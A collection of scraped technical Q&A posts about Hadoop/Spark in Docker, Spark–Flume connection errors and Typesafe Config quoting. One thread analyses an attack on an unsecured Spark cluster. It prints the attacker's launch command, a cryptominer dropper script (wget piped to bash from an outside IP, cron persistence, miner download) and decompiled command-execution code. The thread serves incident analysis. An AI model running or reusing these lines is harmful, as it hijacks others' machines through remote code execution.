21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG RunLengthBitPackingHybridEncoder:119 - Encoding: RunLengthBitPackingHybridEncoder with bithWidth: 1 initialCapacity 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 64 2020-01-28 21:38:53 DEBUG CapacityByteArrayOutputStream:276 - initial slab of size 1024 2020-01-28 21:38:53 DEBUG MemoryManager:138 - Adjust block size from 134,217,728 to 134,217,728 for writer: org.apache.parquet.hadoop.InternalParquetRecordWriter#61628754 2020-01-28 21:38:53 DEBUG RecordConsumerLoggingWrapper:69 - <!-- flush --> 2020-01-28 21:38:53 INFO InternalParquetRecordWriter:165 - Flushing mem columnStore to file. allocated memory: 0 2020-01-28 21:38:53 DEBUG ParquetFileWriter:682 - 4: end 2020-01-28 21:38:54 DEBUG ParquetFileWriter:692 - 1209: footer length = 1205 2020-01-28 21:38:54 DEBUG BytesUtils:159 - write le int: 1205 => 181 4 0 0 2020-01-28 21:38:54 DEBUG DFSClient:1869 - DFSClient writeChunk allocating new packet seqno=0, src=/data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128213853_0001_m_000000_1/part-00000-72cb3fde-ecbe-4969-aac5-becbd65a147d-c000.snappy.parquet, packetSize=65532, chunksPerPacket=127, bytesCurBlock=0 2020-01-28 21:38:54 DEBUG DFSClient:1815 - Queued packet 0 2020-01-28 21:38:54 DEBUG DFSClient:1815 - Queued packet 1 2020-01-28 21:38:54 DEBUG DFSClient:2133 - Waiting for ack for: 1 2020-01-28 21:38:54 DEBUG DFSClient:585 - Allocating new block 2020-01-28 21:38:54 DEBUG Client:1026 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas sending #8 2020-01-28 21:38:54 DEBUG Client:1083 - IPC Client (1473539708) connection to nodemaster/0.0.0.0:9000 from andreas got value #8 2020-01-28 21:38:54 DEBUG ProtobufRpcEngine:253 - Call: addBlock took 6ms 2020-01-28 21:38:54 DEBUG DFSClient:1390 - pipeline = 172.18.1.3:9866 2020-01-28 21:38:54 DEBUG DFSClient:1390 - pipeline = 172.18.1.2:9866 2020-01-28 21:38:54 DEBUG DFSClient:1601 - Connecting to datanode 172.18.1.3:9866 2020-01-28 21:38:54 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null) 2020-01-28 21:38:54 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response 2020-01-28 21:38:57 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null) 2020-01-28 21:38:57 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response 2020-01-28 21:39:00 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null) 2020-01-28 21:39:00 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response 2020-01-28 21:39:03 DEBUG AbstractCoordinator:833 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Sending Heartbeat request to coordinator 192.168.1.156:9092 (id: 2147482646 rack: null) 2020-01-28 21:39:03 DEBUG AbstractCoordinator:846 - [Consumer clientId=consumer-1, groupId=spark-kafka-source-d50ae41c-0b12-45c2-838f-c83c7a7e856d-1198433466-driver-0] Received successful Heartbeat response I am really stuck. I would be grateful for any hint. Thank you. Andreas edit Ok, after some time it breaks with following message: 2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/spark-f5efe1d0-c8d1-4b6b-bb60-352114a9cf2d 2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/temporaryReader-3bdb4248-1e34-460c-b0d0-78c01460ff63 2020-01-28 22:20:21 INFO ShutdownHookManager:54 - Deleting directory /private/var/folders/9g/24386ccd2lg11pqzxj2w5f0r0000gn/T/temporary-d59aa3d8-d255-4134-9793-20a892abaf38 2020-01-28 22:20:21 ERROR DFSClient:930 - Failed to close inode 16620 org.apache.hadoop.ipc.RemoteException(java.io.IOException): File /data/bigdata/tweets/_temporary/0/_temporary/attempt_20200128221820_0001_m_000000_1/part-00000-3e620934-eae5-4235-8a7b-2de07b269e8e-c000.snappy.parquet could only be written to 0 of the 1 minReplication nodes. There are 2 datanode(s) running and 2 node(s) are excluded in this operation. at org.apache.hadoop.hdfs.server.blockmanagement.BlockManager.chooseTarget4NewBlock(BlockManager.java:2135) at org.apache.hadoop.hdfs.server.namenode.FSDirWriteFileOp.chooseTargetForNewBlock(FSDirWriteFileOp.java:294) at org.apache.hadoop.hdfs.server.namenode.FSNamesystem.getAdditionalBlock(FSNamesystem.java:2771) at org.apache.hadoop.hdfs.server.namenode.NameNodeRpcServer.addBlock(NameNodeRpcServer.java:876) so a docker issue? How can I map my containers to my host? My starting script: #!/bin/bash # Bring the services up function startServices { docker start nodemaster node2 node3 sleep 5 echo ">> Starting hdfs ..." docker exec -u hadoop -it nodemaster start-dfs.sh sleep 5 echo ">> Starting yarn ..." docker exec -u hadoop -d nodemaster start-yarn.sh sleep 5 echo ">> Starting MR-JobHistory Server ..." docker exec -u hadoop -d nodemaster mr-jobhistory-daemon.sh start historyserver sleep 5 echo ">> Starting Spark ..." docker exec -u hadoop -d nodemaster start-master.sh docker exec -u hadoop -d node2 start-slave.sh nodemaster:7077 docker exec -u hadoop -d node3 start-slave.sh nodemaster:7077 sleep 5 echo ">> Starting Spark History Server ..." docker exec -u hadoop nodemaster start-history-server.sh sleep 5 echo ">> Preparing hdfs for hive ..." docker exec -u hadoop -it nodemaster hdfs dfs -mkdir -p /tmp docker exec -u hadoop -it nodemaster hdfs dfs -mkdir -p /user/hive/warehouse docker exec -u hadoop -it nodemaster hdfs dfs -chmod g+w /tmp docker exec -u hadoop -it nodemaster hdfs dfs -chmod g+w /user/hive/warehouse sleep 5 echo ">> Starting Hive Metastore ..." docker exec -u hadoop -d nodemaster hive --service metastore echo "Hadoop info # nodemaster: http://172.18.1.1:8088/cluster" echo "DFS Health # nodemaster : http://172.18.1.1:50070/dfshealth" echo "MR-JobHistory Server # nodemaster : http://172.18.1.1:19888" echo "Spark info # nodemaster : http://172.18.1.1:8080" echo "Spark History Server # nodemaster : http://172.18.1.1:18080" } function stopServices { echo ">> Stopping Spark Master and slaves ..." docker exec -u hadoop -d nodemaster stop-master.sh docker exec -u hadoop -d node2 stop-slave.sh docker exec -u hadoop -d node3 stop-slave.sh echo ">> Stopping containers ..." docker stop nodemaster node2 node3 psqlhms } if [[ $1 = "start" ]]; then docker network create --subnet=172.18.0.0/16 hadoopnet # create custom network # Starting Postresql Hive metastore echo ">> Starting postgresql hive metastore ..." docker run -d --net hadoopnet --ip 172.18.1.4 --hostname psqlhms --name psqlhms -it postgresql-hms sleep 5 # 3 nodes echo ">> Starting nodes master and worker nodes ..." docker run -d --net hadoopnet --ip 172.18.1.1 --hostname nodemaster -p 9083:9083 -p 9000:9000 -p 7077:7077 -p 8080:8080 -p 8088:8088 -p 50070:50070 -p 6066:6066 -p 4040:4040 -p 20002:20002 --add-host node2:172.18.1.2 --add-host node3:172.18.1.3 --name nodemaster -it hive docker run -d --net hadoopnet --ip 172.18.1.2 --hostname node2 -p 8081:8081 --add-host nodemaster:172.18.1.1 --add-host node3:172.18.1.3 --name node2 -it spark docker run -d --net hadoopnet --ip 172.18.1.3 --hostname node3 -p 8082:8081 --add-host nodemaster:172.18.1.1 --add-host node2:172.18.1.2 --name node3 -it spark # Format nodemaster echo ">> Formatting hdfs ..." docker exec -u hadoop -it nodemaster hdfs namenode -format startServices exit fi if [[ $1 = "stop" ]]; then stopServices docker rm nodemaster node2 node3 psqlhms docker network rm hadoopnet exit fi if [[ $1 = "uninstall" ]]; then stopServices docker rmi hadoop spark hive postgresql-hms -f docker network rm hadoopnet docker system prune -f exit fi echo "Usage: cluster.sh start|stop|uninstall" echo " start - start existing containers" echo " stop - stop running processes" echo " uninstall - remove all docker images"
apache spark executor submit driver with exploit class
After a lot search and research, I turn to find help here. The problem is that once a Spark cluster is built(one master and 4 workers with different IP address), each executor will submit "driver" constantly. From web UI, I can see a class named "Exploit" submitted with the "driver". web UI Following is head and tail of log file of one worker. Launch Command: "/usr/lib/jvm/jdk1.8/jre/bin/java" "-cp" "/home/labuser/spark/conf/:/home/labuser/spark/jars/*" "-Xmx1024M" "-Dspark.eventLog.enabled=true" "-Dspark.driver.supervise=false" "-Dspark.submit.deployMode=cluster" "-Dspark.app.name=Exploit" "-Dspark.jars=http://192.99.142.226:8220/Exploit.jar" "-Dspark.master=spark://129.10.58.200:7077" "org.apache.spark.deploy.worker.DriverWrapper" "spark://Worker#129.10.58.202:44717" "/home/labuser/spark/work/driver-20180815111311-0065/Exploit.jar" "Exploit" "wget -O /var/tmp/a.sh http://192.99.142.248:8220/cron5.sh,bash /var/tmp/a.sh 18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.allocator.type: unpooled 18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.threadLocalDirectBufferSize: 65536 18/08/15 11:13:56 DEBUG ByteBufUtil: -Dio.netty.maxThreadLocalCharBufferSize: 16384 18/08/15 11:13:56 DEBUG NetUtil: Loopback interface: lo (lo, 0:0:0:0:0:0:0:1%lo) 18/08/15 11:13:56 DEBUG NetUtil: /proc/sys/net/core/somaxconn: 128 18/08/15 11:13:57 DEBUG TransportServer: Shuffle server started on port: 46034 18/08/15 11:13:57 INFO Utils: Successfully started service 'Driver' on port 46034. 18/08/15 11:13:57 INFO WorkerWatcher: Connecting to worker spark://Worker#129.10.58.202:44717 18/08/15 11:13:58 DEBUG TransportClientFactory: Creating new connection to /129.10.58.202:44717 18/08/15 11:13:59 DEBUG AbstractByteBuf: -Dio.netty.buffer.bytebuf.checkAccessible: true 18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.level: simple 18/08/15 11:13:59 DEBUG ResourceLeakDetector: -Dio.netty.leakDetection.maxRecords: 4 18/08/15 11:13:59 DEBUG ResourceLeakDetectorFactory: Loaded default ResourceLeakDetector: io.netty.util.ResourceLeakDetector#350d33b5 18/08/15 11:14:00 DEBUG TransportClientFactory: Connection to /129.10.58.202:44717 successful, running bootstraps... 18/08/15 11:14:00 INFO TransportClientFactory: Successfully created connection to /129.10.58.202:44717 after 1706 ms (0 ms spent in bootstraps) 18/08/15 11:14:00 INFO WorkerWatcher: Successfully connected to spark://Worker#129.10.58.202:44717 18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxCapacity.default: 32768 18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.maxSharedCapacityFactor: 2 18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.linkCapacity: 16 18/08/15 11:14:00 DEBUG Recycler: -Dio.netty.recycler.ratio: 8 I found there is a "Exploit" code which hacks Spark cluster by taking advantage of the fact that anyone can submit applications to an unauthorized Spark cluster. ARBITRARY CODE EXECUTION IN UNSECURED APACHE SPARK CLUSTER But I don't think my cluster is hacked. Cause after applying authorized mode, this problem still exists. My question is anyone else have this problem? And why would this happen?
THIS IS VERY ALARMING! Firstly, the decompiled source code shows that the driver will execute commands supplied to it via arguments. In your case, this wget to download the script to temp, then execute it. The downloaded script downloads a jpg and piped to bash. THIS IS NOT AN IMAGE wget -q -O - http://192.99.142.248:8220/logo10.jpg | bash -sh logo10.jpg contains a cron job that contains even more source code that will be run on your cluster. You are probably seeing this job being submitted because it is starting a scheduled job. #!/bin/sh ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid do kill -9 $procid done rm -rf /dev/shm/jboss ps -fe|grep -w sustes |grep -v grep if [ $? -eq 0 ] then pwd else crontab -r || true && \ echo "* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh" >> /tmp/cron || true && \ crontab /tmp/cron || true && \ rm -rf /tmp/cron || true && \ wget -O /var/tmp/config.json http://192.99.142.248:8220/3.json wget -O /var/tmp/sustes http://192.99.142.248:8220/rig chmod 777 /var/tmp/sustes cd /var/tmp proc=`grep -c ^processor /proc/cpuinfo` cores=$((($proc+1)/2)) num=$(($cores*3)) /sbin/sysctl -w vm.nr_hugepages=`$num` nohup ./sustes -c config.json -t `echo $cores` >/dev/null & fi sleep 3 echo "runing....." Decompiled Source public class Exploit { public Exploit() { } public static void main(String[] var0) throws Exception { String[] var1 = var0[0].split(","); String[] var2 = var1; int var3 = var1.length; for(int var4 = 0; var4 < var3; ++var4) { String var5 = var2[var4]; System.out.println(var5); System.out.println(executeCommand(var5.trim())); System.out.println("=============================================="); } } private static String executeCommand(String var0) { StringBuilder var1 = new StringBuilder(); try { Process var2 = Runtime.getRuntime().exec(var0); var2.waitFor(); BufferedReader var3 = new BufferedReader(new InputStreamReader(var2.getInputStream())); String var4; while((var4 = var3.readLine()) != null) { var1.append(var4).append("\n"); } } catch (Exception var5) { var5.printStackTrace(); } return var1.toString(); } }
Spark + Flume : "Unable to create Rpc client"
I am trying to connect a scala spark-shell with a flume agent. I launch the shell : ./bin/spark-shell --jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume-sink_2.10-1.6.0.jar --jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume_2.10-1.6.0.jar --jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume-assembly_2.10-1.6.0.jar And launch a scala script to listen on port 10000 of localhost : import org.apache.spark.SparkConf import org.apache.spark.streaming._ import org.apache.spark.streaming.flume._ import org.apache.spark.util.IntParam val host = "localhost" val port = 10000 val batchInterval = Milliseconds(5000) // Create the context and set the batch size val sparkConf = new SparkConf().setAppName("FlumePollingEventCount") val ssc = new StreamingContext(sc, batchInterval) // Create a flume stream that polls the Spark Sink running in a Flume agent val stream = FlumeUtils.createPollingStream(ssc, host, port) // Print out the count of events received from this server in each batch stream.count().map(cnt => "Received " + cnt + " flume events." ).print() ssc.start() ssc.awaitTermination() Then I configure and start a shell agent : 1) configuration : I make a tail - f on a file appended by another running script (I think it doesn't matter to detail that here) agent1.sources = source1 agent1.channels = channel1 agent1.sinks = spark agent1.sources.source1.type = exec agent1.sources.source1.command = tail -f /Users/romain/Informatique/notebooks/spark_scala/velib/logs/trajets.csv agent1.sources.source1.channels = channel1 agent1.channels.channel1.type = memory agent1.channels.channel1.capacity = 2000000 agent1.channels.channel1.transactionCapacity = 1000000 agent1.sinks = avroSink agent1.sinks.avroSink.type = avro agent1.sinks.avroSink.channel = channel1 agent1.sinks.avroSink.hostname = localhost agent1.sinks.avroSink.port = 10000 2) start : ./bin/flume-ng agent --conf conf --conf-file ./conf/avro_velib.conf --name agent1 -Dflume.root.logger=INFO,console And then things go ok till an error : 2017-02-01 15:09:55,688 (conf-file-poller-0) [INFO - org.apache.flume.node.Application.startAllComponents(Application.java:173)] Starting Sink avroSink 2017-02-01 15:09:55,688 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:289)] Starting RpcSink avroSink { host: localhost, port: 10000 }... 2017-02-01 15:09:55,688 (conf-file-poller-0) [INFO - org.apache.flume.node.Application.startAllComponents(Application.java:184)] Starting Source source1 2017-02-01 15:09:55,689 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.source.ExecSource.start(ExecSource.java:169)] Exec source starting with command:tail -f /Users/romain/Informatique/notebooks/spark_scala/velib/logs/trajets.csv 2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.register(MonitoredCounterGroup.java:120)] Monitored counter group for type: SINK, name: avroSink: Successfully registered new MBean. 2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.start(MonitoredCounterGroup.java:96)] Component type: SINK, name: avroSink started 2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AbstractRpcSink.createConnection(AbstractRpcSink.java:206)] Rpc sink avroSink: Building RpcClient with hostname: localhost, port: 10000 2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AvroSink.initializeRpcClient(AvroSink.java:126)] Attempting to create Avro Rpc client. 2017-02-01 15:09:55,691 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.register(MonitoredCounterGroup.java:120)] Monitored counter group for type: SOURCE, name: source1: Successfully registered new MBean. 2017-02-01 15:09:55,692 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.start(MonitoredCounterGroup.java:96)] Component type: SOURCE, name: source1 started 2017-02-01 15:09:55,710 (lifecycleSupervisor-1-1) [WARN - org.apache.flume.api.NettyAvroRpcClient.configure(NettyAvroRpcClient.java:634)] Using default maxIOWorkers 2017-02-01 15:10:15,802 (lifecycleSupervisor-1-1) [WARN - org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:294)] Unable to create Rpc client using hostname: localhost, port: 10000 org.apache.flume.FlumeException: NettyAvroRpcClient { host: localhost, port: 10000 }: RPC connection error at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:182) at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:121) at org.apache.flume.api.NettyAvroRpcClient.configure(NettyAvroRpcClient.java:638) at org.apache.flume.api.RpcClientFactory.getInstance(RpcClientFactory.java:89) at org.apache.flume.sink.AvroSink.initializeRpcClient(AvroSink.java:127) at org.apache.flume.sink.AbstractRpcSink.createConnection(AbstractRpcSink.java:211) at org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:292) at org.apache.flume.sink.DefaultSinkProcessor.start(DefaultSinkProcessor.java:46) at org.apache.flume.SinkRunner.start(SinkRunner.java:79) at org.apache.flume.lifecycle.LifecycleSupervisor$MonitorRunnable.run(LifecycleSupervisor.java:251) at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511) at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308) at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180) at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at java.lang.Thread.run(Thread.java:745) Caused by: java.io.IOException: Error connecting to localhost/127.0.0.1:10000 at org.apache.avro.ipc.NettyTransceiver.getChannel(NettyTransceiver.java:261) at org.apache.avro.ipc.NettyTransceiver.<init>(NettyTransceiver.java:203) at org.apache.avro.ipc.NettyTransceiver.<init>(NettyTransceiver.java:152) at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:168) ... 16 more Any idea welcom
You should start "listenner"(spark app in your case) first and then launch "writer" (flume-ng)
Instead of localhost use your machine name i.e (machine name used in spark conf) in both scala and avroconf. agent1.sinks.avroSink.hostname = <Machine name> agent1.sinks.avroSink.port = 10000
Typesafe Config - reference.conf different behavior?
It seems to me that application.conf and reference.conf behaves differently. I do understand that reference.conf is intended as "safe fall back" configuration which works every time and application.conf is specific. However I would expect that configuration loaded from either of those will behave exactly the same in the sense of parsing the configuration. What I am facing is that if the configuration is in application.conf it works fine and when the same file is renamed to reference.conf it doesn't work. 2015-03-30 11:35:54,603 [DEBUG] [BackEndServices-akka.actor.default-dispatcher-15] [com.ss.rg.service.ad.AdImporterServiceActor]akka.tcp://BackEndServices#127.0.0.1:2551/user/AdImporterService - Snapshot saved successfully - removing messages and snapshots up to 0 and timestamp: 1427708154584 2015-03-30 11:35:55,037 [DEBUG] [BackEndServices-akka.actor.default-dispatcher-4] [spray.can.server.HttpListener]akka.tcp://BackEndServices#127.0.0.1:2551/user/IO-HTTP/listener-0 - Binding to /0.0.0.0:8080 2015-03-30 11:35:55,054 [DEBUG] [BackEndServices-akka.actor.default-dispatcher-15] [akka.io.TcpListener]akka.tcp://BackEndServices#127.0.0.1:2551/system/IO-TCP/selectors/$a/0 - Successfully bound to /0:0:0:0:0:0:0:0:8080 2015-03-30 11:35:55,056 [INFO ] [BackEndServices-akka.actor.default-dispatcher-4] [spray.can.server.HttpListener]akka.tcp://BackEndServices#127.0.0.1:2551/user/IO-HTTP/listener-0 - Bound to /0.0.0.0:8080 Compared to : 2015-03-30 11:48:34,053 [INFO ] [BackEndServices-akka.actor.default-dispatcher-3] [Cluster(akka://BackEndServices)]Cluster(akka://BackEndServices) - Cluster Node [akka.tcp://BackEndServices#127.0.0.1:2551] - Leader is moving node [akka.tcp://BackEndServices#127.0.0.1:2551] to [Up] 2015-03-30 11:48:36,413 [DEBUG] [BackEndServices-akka.actor.default-dispatcher-15] [spray.can.server.HttpListener]akka.tcp://BackEndServices#127.0.0.1:2551/user/IO-HTTP/listener-0 - Binding to "0.0.0.0":8080 2015-03-30 11:48:36,446 [DEBUG] [BackEndServices-akka.actor.default-dispatcher-3] [akka.io.TcpListener]akka.tcp://BackEndServices#127.0.0.1:2551/system/IO-TCP/selectors/$a/0 - Bind failed for TCP channel on endpoint ["0.0.0.0":8080]: java.net.SocketException: Unresolved address 2015-03-30 11:48:36,446 [WARN ] [BackEndServices-akka.actor.default-dispatcher-15] [spray.can.server.HttpListener]akka.tcp://BackEndServices#127.0.0.1:2551/user/IO-HTTP/listener-0 - Bind to "0.0.0.0":8080 failed The settle difference are double quotes. And my configuration is specified as follows: akka { ... standard akka configuration ... } webserver.port = 8080 webserver.bindaddress = "0.0.0.0" Configuration setting is loaded as follows in code: val webserver_port_key = "webserver.port" val webserver_bindaddress_key = "webserver.bindaddress" protected val webserver_bindaddress = ConfigFactory.load().getString(webserver_bindaddress_key) protected val webserver_port = ConfigFactory.load().getInt(webserver_port_key) Did I missed something? I double checked that the port 8080 is free when reference.conf fails to bind. Thanks for hints UPDATE: Start with log-config-on-start = on: - When it is in application.conf # application.conf: 60-61 "webserver" : { # application.conf: 61 "bindaddress" : "0.0.0.0", # application.conf: 60 "port" : 8080 } - When it is in reference.conf # reference.conf: 60-61 "webserver" : { # reference.conf: 61 "bindaddress" : "0.0.0.0", # reference.conf: 60 "port" : 8080 } Issue found : # application.properties "webserver" : { # application.properties "bindaddress" : "\"0.0.0.0\"", # application.properties "port" : "8080" }
It seems that the bindaddress is of a different type because it shows up differently in logs. In either case enable Akka full config printing on start with this setting in your config: log-config-on-start = on Then compare both configurations to see where they mismatch. They should work the same way if the are the same. I suspect that the way you define bindaddress is different, i.e. String vs some other type.